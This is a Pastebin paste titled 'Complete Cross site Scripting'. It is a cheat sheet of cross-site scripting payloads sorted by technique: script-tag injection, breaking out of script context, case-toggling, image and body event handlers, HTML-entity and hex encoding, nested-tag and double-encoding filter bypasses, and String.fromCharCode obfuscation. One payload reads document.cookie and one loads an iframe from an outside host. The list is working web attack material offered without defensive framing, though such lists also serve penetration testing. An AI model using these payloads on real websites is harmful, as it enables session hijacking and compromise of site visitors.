Advertisement
moemyintshein

Complete Cross site Scripting

Mar 14th, 2017
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.17 KB | None | 0 0
  1. Basic XSS codes:
  2. ———————————-
  3.  
  4. <script>alert(“XSS”)</script>
  5. <script>alert(“XSS”);</script>
  6. <script>alert(‘XSS’)</script>
  7. “><script>alert(“XSS”)</script>
  8. <script>alert(/XSS”)</script>
  9. <script>alert(/XSS/)</script>
  10.  
  11. #When inside Script tag:
  12.  
  13. </script><script>alert(1)</script>
  14. ‘; alert(1);
  15. ‘)alert(1);//
  16.  
  17. #Bypassing with toggle case:
  18.  
  19. <ScRiPt>alert(1)</sCriPt>
  20. <IMG SRC=jAVasCrIPt:alert(‘XSS’)>
  21.  
  22. #XSS in Image and HTML tags:
  23.  
  24. <IMG SRC=”javascript:alert(‘XSS’);”>
  25. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  26. <IMG SRC=javascript:alert(‘XSS’)>
  27. <img src=xss onerror=alert(1)>
  28. <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
  29. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  30. <IMG SRC=”jav ascript:alert(‘XSS’);”>
  31. <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
  32. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  33. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  34. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  35. <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
  36. <BODY ONLOAD=alert(‘XSS’)>
  37. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
  38. <IMG SRC=”javascript:alert(‘XSS’)”
  39. <iframe src=http://ha.ckers.org/scriptlet.html <
  40.  
  41. #Bypass the script tag filtering:
  42.  
  43. <<SCRIPT>alert(“XSS”);//<</SCRIPT>
  44. %253cscript%253ealert(1)%253c/script%253e
  45. “><s”%2b”cript>alert(document.cookie)</script>
  46. foo<script>alert(1)</script>
  47. <scr<script>ipt>alert(1)</scr</script>ipt>
  48.  
  49. #Using String.fromCharCode function:
  50.  
  51. <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
  52. ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement